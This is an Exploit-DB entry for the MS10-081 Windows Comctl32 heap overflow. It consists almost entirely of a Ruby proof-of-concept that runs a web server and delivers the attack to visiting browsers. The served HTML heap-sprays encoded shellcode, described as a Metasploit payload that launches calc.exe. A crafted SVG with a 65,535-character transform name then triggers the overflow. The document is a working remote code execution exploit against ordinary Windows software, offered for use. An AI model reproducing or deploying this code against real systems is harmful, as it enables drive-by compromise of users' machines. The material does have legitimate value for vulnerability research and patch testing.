Microsoft Windows - Common Control Library 'Comctl32' Heap Overflow (MS10-081)

EDB-ID:

15963




Platform:

Windows

Date:

2011-01-10


#!/usr/bin/env ruby
 
# http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept
# Nephi Johnson

require 'socket'

def http_send(sock, data, opts={})
    defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"}
    opts = defaults.merge(opts)
    
    code = opts[:code]
    message = opts[:message]
    type = opts[:type]
    
    date_str = Time.now.gmtime.strftime("%a, %d %b %Y %H:%M:%S GMT")
    headers = "HTTP/1.1 #{code} #{message}\r\n" +
              "Date: #{date_str}\r\n" +
              "Content-Length: #{data.length}\r\n" +
              "Content-Type: #{type}\r\n\r\n"
    puts "[+] Sending #{opts[:desc]}"
    sock.write(headers + data) rescue return false
    return true
end
 
def sock_read(sock, out_str, timeout=5)
    begin
        if Kernel.select([sock],[],[],timeout)
            out_str.replace(sock.recv(1024))
            puts "[+] Received:"
            puts "    " + out_str.split("\n")[0]
            return true
        else
            sock.close
            return false
        end
    rescue Exception => ex
        return false
    end
end

port = ARGV[0] || 55555

transform_name = "\x21" * 65535

svg = <<-SVG
<?xml version="1.0"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg xmlns="http://www.w3.org/2000/svg"
    xmlns:xlink="http://www.w3.org/1999/xlink">

    <rect x="50" y="50" height="110" width="110"
          style="fill: #ffffff"
          transform="#{transform_name}(10) translate(30) rotate(45 50 50)"
            >
    </rect>
    <text x="100" y="100">CLICK ME</text>
</svg>
SVG

html = <<-HTML
<html>
    <body>
        <script>
            <!--
                function str_dup(str, length) {
                    var result = str;
                    while(result.length < length) {
                        result += result;
                    }
                    return result.substr(result.length - length);
                }

                var shellcode = unescape("%u9000%u9090%u9090") +
                                // msfpayload windows/exec CMD=calc.exe R | msfencode -t js_le -b "\x00"
                                unescape("%u39ba%ue680%udb4f%u29dc%ub1c9%ud933%u2474%u58f4" +
                                         "%u5031%u8313%u04c0%u5003%u6236%ub313%ueba0%u4cdc" +
                                         "%u8c30%ua955%u9e01%ub902%u2e33%uef40%uc5bf%u0404" +
                                         "%uab34%u2b80%u06fd%u02f7%ua6fe%uc837%ua83c%u13cb" +
                                         "%u0a10%udbf5%u4b65%u0132%u1985%u4deb%u8e37%u1098" +
                                         "%uaf8b%u1f4e%ud7b3%ue0eb%u6247%u30f5%uf9f7%ua8bd" +
                                         "%ua57c%uc81d%ub551%u8362%u0ede%u1210%u5f36%u24d9" +
                                         "%u0c76%u88e4%u4c7b%u2e20%u3b63%u4c5a%u3c1e%u2e99" +
                                         "%uc9c4%u883c%u6a8f%u28e5%uec5c%u266e%u7a29%u2b28" +
                                         "%uafac%u5742%u4e25%ud185%u757d%ub901%u1426%u6710" +
                                         "%u2989%ucf42%u8c76%ue208%ub663%u6952%u3a72%ud4e9" +
                                         "%u4474%u76f2%u751c%u1979%u8a5b%u5da8%uc093%uf4f1" +
                                         "%u8d3b%u4563%u2e26%u8a5e%uad5e%u736b%uada5%u7619" +
                                         "%u69e2%u0af1%u1c7b%ub9f5%u357c%u5c96%ud5ee%ufa77" +
                                         "%u7c96%u0e88");
                var base = str_dup(unescape("%u2100"), 0x800 - shellcode.length);
                var arr = [];
                for(var i = 0; i < 2000; i++) {
                    arr[i] = document.createElement("a");
                    arr[i].innerHTML = [base + shellcode].join("");
                }
            -->
        </script>
        <iframe width="100%" height="100%" src="poc.svg" marginheight="0" marginwidth="0"></iframe>
    </body>
</html>
HTML

puts "[+] Listening on port #{port}"
puts

TCPServer.open(port) do |srv|
    while true
        cli = srv.accept
        req = ""
        next unless sock_read(cli, req, 5)
        while req.length > 0
            if req =~ /GET.*svg/i
                break unless http_send(cli, svg, :type=>"image/svg+xml", :desc=>"svg")
            elsif req =~ /QUIT/
                exit()
            else
                break unless http_send(cli, html, :type=>"text/html", :desc=>"html")
            end
            req = ""
            next unless sock_read(cli, req, 5)
        end
        cli.close rescue next
    end
end